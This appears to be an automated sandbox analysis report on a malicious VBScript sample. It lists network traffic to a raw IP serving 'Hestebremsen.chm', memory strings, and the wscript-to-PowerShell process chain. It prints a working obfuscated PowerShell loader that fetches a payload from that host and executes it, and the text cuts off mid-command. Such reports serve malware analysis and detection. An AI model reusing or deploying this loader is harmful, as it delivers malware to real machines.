Source: transferencia.vbs |
Virustotal: Detection: 14% |
Perma Link |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 98.6% probability |
Source: |
Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ion.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.109.20.161 |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C628000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://91.109.20.161 |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6EB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://91.109.20.161( |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://91.109.20.161/Hestebremsen.chmP |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1B878000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer |